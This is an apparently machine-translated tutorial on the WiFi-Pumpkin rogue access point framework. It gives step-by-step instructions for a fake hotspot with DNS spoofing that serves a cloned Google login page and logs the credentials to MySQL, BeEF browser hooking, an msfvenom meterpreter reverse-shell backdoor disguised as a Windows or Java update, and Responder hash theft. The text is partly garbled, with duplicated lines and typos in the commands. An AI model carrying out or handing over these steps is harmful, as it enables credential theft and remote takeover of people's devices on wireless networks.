*The original author of this article: blacksunny, this article is an original reward program of freebuf, which is prohibited to reprint without permission

describe

WiFi pumpkin is a complete framework dedicated to wireless environment penetration testing, which can forge access points to complete man in the middle attack, and also support some other wireless penetration testing functions. Aiming to provide a more secure wireless network service, the tool can be used to monitor the traffic data of the target user, and capture the unknown user through wireless phishing, so as to achieve the purpose of monitoring the data traffic of the target user.

major function

• Rouge WiFi Access Point

Rouge WiFi Access Point

• Deauth Attack Clients AP

Deauth Attack Clients AP

• Probe Request Monitor

Probe Request Monitor

• DHCP Starvation Attack

DHCP Starvation Attack

• Credentials Monitor

Credentials Monitor

• Transparent Proxy

Transparent Proxy

• Windows Update Attack

Windows Update Attack

• Phishing Manager

Phishing Manager

• Partial Bypass HSTS protocol

Partial Bypass HSTS protocol

• Support beef hook

Support beef hook

• ARP Poison

ARP Poison

• DNS Spoof

DNS Spoof

• Patch Binaries via MITM

Patch Binaries via MITM

• Karma Attack (supporthostapd-mana)

Karma Attack (supporthostapd-mana)

• LLMNR,NBT-NS and MDNSpoisoner(Responder)

LLMNR,NBT-NS and MDNSpoisoner(Responder)

• Pumpkin-Proxy(ProxyServer(mitmproxyAPI))

Pumpkin-Proxy(ProxyServer(mitmproxyAPI))

• Capture images on the fly

Capture images on the fly

• TCP-Proxy(with scapy)

TCP-Proxy(with scapy)

Plug-in unit

Transparent Proxy:

Transparentproxy can allow users to intercept / modify traffic information, at the same time, it can achieve JavaScript injection of the target page, and it can also easily achieve modular injection and create a python file (plugins / extension / directory), and finally display information under the pumpproxy (label).

TCP-Proxy Server

You can set up a proxy in TCP stream. It can filter the request and response flow through the scapy module and modify the packets of the TCP protocol to obtain the interception. This plug-in uses modules to view or modify the intercepted data. Only add your custom module in "plugins / analysts /", and it will be listed in the TCP proxy tag automatically.

Install WiFi pumpkin

• git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

• pip install –r requirements.txt

pip install –r requirements.txt

• ./installer.sh –install

./installer.sh –install

• Run wifi-pumpkin: Python wifi-pumpkin.py

Run wifi-pumpkin: Python wifi-pumpkin.py

Create fishing page

Set MYSQL

• /etc/init.d/mysql start

/etc/init.d/mysql start

• Mysql –u root

Mysql –u root

• Create database xeus;

Create database xeus;

• Use xeus;

Use xeus;

• Create table logins(networkvarchar(64), email varchar(64), password varchar(64));

Create table logins(networkvarchar(64), email varchar(64), password varchar(64));

Download fake page

• git clone https://github.com/XeusHack/Fake-Login-Page.git

git clone https://github.com/XeusHack/Fake-Login-Page.git

• Put the fake login page file in the / var / www directory.

Put the fake login page file in the / var / www directory.

• Edit the database.php file and set the file content:

Edit the database.php file and set the file content:

$username = “root”;

$password = “”;

$db_name = “xeus”;

$tbl_name = “logins”;

$username = “root”;

$password = “”;

$db_name = “xeus”;

$tbl_name = “logins”;

The content set here is set according to your own environment. Here is my environment.

Restart MySQL / etc / init.d/mysql restart

Set up WiFi pumpkin

Run wifi-pumpkin, enter this directory, Python wifi-pumpkin.py

To switch to the settings command, you can set the SSID number. Here, I directly select the default pumpap with the channel number of 11. Here, I select enable wireless security with the password of 1234567890, etc. Note: here the NetworkAdapter is the name of the wireless network card. You need to buy a wireless network card.

然后往下拉，可以看到默认设置dhcp服务设置的信息，这里保持默认就行。


Cancel the proxy, click plugins next to it, and then cancel the proxy server, as shown in the figure.

Click start, and then you can see the wireless hotspot with the SSID of pumpap on the mobile phone. You can see the encryption status. Enter the set password; 1234567890, you can connect.

Then click DNS spoofer under modules to enter the page. Take dnsspoof default domain name example.com as an example, click Start attack. Make DNS spoofrunning

Select the phishing manager module, select index.html in options, and click Start server. Then, after the mobile client connects to the pumpap wireless hotspot, enter the domain name of example.com, and the setting information appears.

Then select setdirectory, as shown in the figure, set the fake login page path set above to setenv path, and then click Start server. You can see the relevant forged pages in the mobile client.

Enter the mailbox and password on the fake Google page above, and then enter the logins table of Mysql to see the relevant information.

Beef with attack

Run. / bef in the / usr / share / bef XSS directory. As shown in the figure. Select the hook URL.

Then log in to beef at http://127.0.0.1:3000/ui/authentication. The default account and password are beef.

Follow the above process to set the pumpap wireless hotspot, enter the physics manager module, and select set as shown in the figure.

Then click Start server to run, then connect to the pumpap wireless hotspot on the mobile client, and then open the domain name of example.com. The attacked machine will appear on the beef page. Then you can go into deep attack through beef.

Rebound shell

Generate a shellcode backdoor, use the msfvenom command: mefvenom – pwindows / meterpreter / reverse_tcp lhost = your local IP address lport = 4444 – f exe – o windowsupdate.exe to enter the msfconsole interface, and wait for the shell to connect.

According to the settings of WiFi push, enter the DNS spoofer interface, delete the example.com in DNS: spoof, and then fill in a domain name by yourself (I still choose example.com here). Here, please note that the previous example.com must be deleted. If it doesn't occupy a port, the subsequent operation will not succeed.

On the DNS spoofer page, select fake update to enter this page, and then add your own shellcode back door to this path. Here, you can choose windows update or Java update. The network adapter should choose WLAN 0, its own wireless network card.

Then connect to my fake pumpap wireless hotspot on the target machine and enter the domain name of example.com. You can enter the forgery page selected above.

The Java update page is shown below.

If the attacker's computer downloads our back door, it installs the back door. Then we can get its computer permission in Kali.

Stealing Accouts Password Hashes

Run WiFi pumpkin program, and select responder in advanced mode: monitor mitm attack on the interface. As shown in the figure.

Then select responder in plugins and close enable proxy server. You can open the configuration page in change. (generally, it is better by default. You can also turn it on and off according to the options you want to grab), as shown in the figure.

Our main purpose is to grab the account and password of windows, run this operation on the target machine, and the user name and hash password of the target machine will be displayed in the WiFi Pushkin responder.

Conclusion:

The above is mainly verified by reference to some articles. The reference articles are as follows:

http://www.freebuf.com/articles/network/137159.html

https://github.com/P0cL4bs/WiFi-Pumpkin

*The original author of this article: blacksunny, this article is an original reward program of freebuf, which is prohibited to reprint without permission